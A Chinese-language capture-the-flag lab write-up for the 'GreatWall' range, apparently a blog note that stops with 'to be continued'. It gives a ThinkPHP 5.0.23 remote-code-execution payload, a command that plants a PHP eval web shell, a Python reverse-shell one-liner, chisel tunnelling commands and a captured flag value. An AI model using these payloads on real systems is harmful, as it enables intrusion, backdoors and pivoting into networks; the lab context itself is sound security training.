春秋云境笔记 - 1

GreatWall / *

GreatWall

用 fscan 扫一下,直接就扫出是 tp5 的漏洞

1
2
3
4
5
[2025-04-12 15:40:37] [SUCCESS] 目标: http://8.130.145.86:8080
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息:
links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce

用 PoC 试了一下,可以 RCE,对着路由 /index.php?s=captcha 发一个 POST,带上如下参数:

1
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

执行 pwd 看到当前目录为 /var/www/html/background/public

执行以下命令写一个 PHP 马,注意要使用单引号,双引号的话 $_POST 变量会被解析掉,导致写的马不对

1
echo '<?php @eval($_POST[cmd]);?>' > /var/www/html/background/public/test.php

用蚁剑连接,在根目录拿到 flag01:flag{176f49b6-147f-4557-99ec-ba0a351e1ada}

再写个 python 反弹 shell 的脚本:

1
import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

然后在蚁剑的终端里执行(蚁剑这个终端就怪怪的)
用蚁剑把 fscan 传上去,执行 ip a 看一下地址

搞个 chisel,在 VPS 上执行

1
./chisel_1.10.1_linux_amd64 server -p 6667 --reverse
1
./chisel client *.*.*.*:6667 R:0.0.0.0:10000:socks &

// To be continued…

参考

2024 - GreatWall

作者

未央

发布于

2025-04-09

更新于

2025-04-16

许可协议

评论